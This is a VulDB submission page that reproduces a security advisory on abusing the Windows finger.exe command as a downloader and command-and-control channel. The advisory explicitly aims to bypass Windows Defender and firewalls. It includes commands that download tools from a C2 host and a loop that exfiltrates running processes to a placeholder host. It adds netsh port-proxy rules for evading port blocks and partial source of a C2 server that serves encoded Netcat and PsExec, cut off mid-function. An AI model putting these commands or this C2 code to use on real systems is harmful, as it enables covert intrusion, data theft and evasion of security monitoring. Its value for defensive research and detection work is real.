| 标题 | Windows TCPIP Finger Command "finger.exe" / C2 Channel and Bypassing Security Software |
|---|
| 描述 | [+] Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS, can be used as a file downloader and makeshift C2 channel.
Legitimate use of Windows Finger Command is to send Finger Protocol queries to remote Finger daemons to retrieve user information.
However, the finger client can also save the remote server response to disk using the command line redirection operator ">".
Intruders who compromise a computer may find it is locked down and "unknown" applications may be unable to download programs or tools.
By using built-in native Windows programs, its possible they may be whitelisted by installed security programs and allowed to download files.
Redteams and such using LOL methods have made use of "Certutil.exe", native Windows program for downloading files. However, Certutil.exe is
recently blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://.
Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data.
The Finger protocol as a C2 channel part works by abusing the "user" token of the FINGER Query protocol "user@host". C2 commands masked as
finger queries can download files and or exfil data without Windows Defender interference.
Download files:
C:\> finger <C2-Command>@HOST > Malwr.txt
Exfil running processes:
C:\> for /f "tokens=1" %i in ('tasklist') do finger %[email protected]
Typically, (Port 79) default port used by FINGER protocol is often blocked by organizations. Privileged users can bypass this using
Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions to reach servers using unrestricted ports like 80/443.
Portproxy queries are then sent first to the Local Machines ip-address which are then forwarded to the C2 server specified.
Port 43 (WHOIS) traffic.
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79
To display Portproxy use "C:\>netsh interface portproxy show all".
E.g. using Port 79
Ncat64.exe "nc@C2-Server" > tmp.txt
E.g. using Portproxy, send the query to local-ip first.
Ncat64.exe "nc@Local-IP" > tmp.txt
To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files.
DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads.
DarkFinger C2 expects exfil data to prefixed with the dot "." character, so any arbitrary inbound querys are not confused for exfil.
This can be changed to whatever or even expanded upon to use XOR obfuscation methods etc... as this is just for basic PoC.
[Event Logs / Forensics]
Certutil.exe file downloads are now blocked and logged by Windows Defender.
"Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
... etc"
PowerShell, also used as an LOL method to download files usually generates Windows event logs. Finger initiated downloads write
to disk and will leave forensic artifacts. Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well.
However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere.
DarkFinger.py C2 is very basic with no security. It's only to demonstrate using Windows Finger Command for as a C2 channel
and show the possibilities. Therefore, anyone can request to change the Port DarkFinger C2 listens on and or download files.
During my research, I found nothing on the internet publicly using or documenting Windows TCPIP Finger Command for use as C2 channel.
Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat" which calls the Windows finger.exe in attacker friendly ways.
Tested successfully Windows 10.
[DarkFinger-C2.py]
import socket,sys,re,time,os,argparse
from subprocess import *
from subprocess import Popen, PIPE, STDOUT
#DarkFinger / Windows Finger TCPIP Command C2 Server (c)
#Downloader and Covert Data Tunneler
#By John Page (aka hyp3rlinx)
#ApparitionSec
#twitter.com/hyp3rlinx
#
#File Downloads must be Base64 encoded text-files.
#Agents can change the port DarkFinger listens on dynamically:
#E.g. set to listen on port 80
#C:\>finger.exe !80!@DarkFinger-Server
#When not using Port 79, we need a Portproxy to send Port 79 traffic outbound to the specified Port.
#Also, when using Ports other than Port 79 (default) we issue queries first to the machine running the Agent E.g.
#C:\>finger.exe <Command>@<Local-Machines-IP>
#
#Agents can change the Download wait time, to try an ensure files are fully downloaded before closing connections.
#Default time sent by the DF-Agent.bat PoC script is set to 10 seconds when issuing Download commands.
#Changing wait time before closing the socket when downloading PsExec64.exe E.g.
#C:\>finger.exe ps%<Wait-Time-Secs>%@%<DarkFinger-Server>%
#==============================================================================================================
#
port = 79 #Default if the client unable to Portproxy, use port 80/443 if possible.
downloads_dir = "Darkfinger_Downloads" #Directory containing the Base64 encoded files for download
nc64 = downloads_dir+"\\nc.txt" #Base64 encoded Netcat
psexec = downloads_dir+"\\ps.txt" #Base64 encoded PsExec64
byte_sz = 4096 #Socket recv
allowed_ports = [22,43,53,79,80,443] #Restrict to a few.
BANNER="""
____ __ _______
/ __ \____ ______/ /__/ ____(_)___ ____ ____ _____
/ / / / __ `/ ___/ //_/ /_ / / __ \/ __ `/ _ \/ ___/
/ /_/ / /_/ / / / ,< / __/ / / / / / /_/ / __/ /
/_____/\__,_/_/ /_/|_/_/ /_/_/ /_/\__, /\___/_/
/____/ v1
Finger TCPIP Command C2 Server
By hyp3rlinx
ApparitionSec
"""
def remove_cert_info(f):
try:
r1 = open(f)
lines = r1.readlines()
lines = lines[1:]
r1.close()
w1 = open(f,'w')
w1.writelines(lines)
w1.close()
r2 = open(f)
lines2 = r2.readlines()
lines2 = lines2[:-1]
r2.close()
w2 = open(f,'w')
w2.writelines(lines2)
w2.close()
except Exception as e:
print(str(e))
exit()
def create_base64_files(file_conf):
global downloads_dir
if os.path.exists(file_conf):
if os.stat(file_conf).st_size == 0:
print("[!] Warn: Supplied conf file is empty, no downloads were specified!")
exit()
else:
print("[!] Supplied conf file does not exist :(")
exit()
try:
path=os.getcwd()
if not os.path.exists(path+"\\"+downloads_dir):
os.makedirs(downloads_dir)
f=open(file_conf, "r")
for x in f:
x = x.strip()
if os.path.exists(path+"\\"+x):
proc = Popen(["certutil.exe", "-encode", path+"\\"+x, path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"],
stdout=PIPE, stderr=PIPE, shell=False)
out, err = proc.communicate()
if "ERROR_FILE_EXISTS" in str(out):
print("[!] Cannot encode " + x[:2]+".txt" + " as it already exists, delete it (-d flag) and try again :(")
exit()
time.sleep(0.5)
#Remove certificate info generated by Windows Certutil.
if os.path.exists(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"):
remove_cert_info(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt")
print("[+] Created " + x + " Base64 encoded text-file "+x[:2].lower()+".txt" +" for download.")
else:
print("[!] Warn: File specified in the conf file to Base64 encode ("+x+") does not exist!")
exit()
f.close()
except Exception as e:
print(str(e))
def delete_base64_files():
global downloads_dir
path=os.getcwd()
if os.path.exists(path+"\\"+downloads_dir):
try:
filelist = [ f for f in os.listdir(path+"\\"+downloads_dir) if f.endswith(".txt") ]
for f in filelist:
os.remove(os.path.join(path+"\\"+downloads_dir, f))
except Exception as e:
print(str(e))
exit()
def B64Exec(t):
payload=""
try:
f=open(t, "r")
for x in f:
payload += x
f.close()
except Exception as e:
pass
print(str(e))
return 9
return payload
def finga_that_box(cmd, victim):
cmd = cmd.rstrip()
if cmd[:1] != ".":
cmd = cmd[0:2]
if cmd == "nc":
print("[+] Serving Nc64.exe")
sys.stdout.flush()
return nc64
if cmd == "ps":
print("[+] Serving PsExec64.exe")
sys.stdout.flush()
return psexec
|
|---|
| 来源 | ⚠️ http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt |
|---|
| 用户 | hyp3rlinx (UID 238) |
|---|
| 提交 | 2020-09-12 03時18分 (6 年前) |
|---|
| 管理 | 2020-09-12 10時06分 (7 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 161165 [Microsoft Windows finger.exe 权限提升] |
|---|
| 积分 | 20 |
|---|